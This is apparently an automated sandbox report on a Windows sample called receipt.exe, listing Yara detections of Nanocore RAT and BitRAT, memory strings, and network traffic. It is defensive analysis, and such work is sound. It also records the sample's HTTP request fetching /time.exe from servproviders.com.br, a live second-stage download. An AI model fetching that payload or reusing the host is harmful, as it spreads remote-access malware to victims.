Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: time[1].exe.25.dr String found in binary or memory: https://www.openssl.org/H
Source: unknown DNS traffic detected: queries for: servproviders.com.br
Source: global traffic HTTP traffic detected: GET /time.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: servproviders.com.brConnection: Keep-Alive

E-Banking Fraud
barindex
Yara detected Nanocore RAT
Source: Yara match File source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, type: DROPPED Matched rule: Detects BitRAT RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, type: DROPPED Matched rule: Detects BitRAT RAT Author: ditekSHen
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: receipt.exe
Uses 32bit PE files
Source: receipt.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
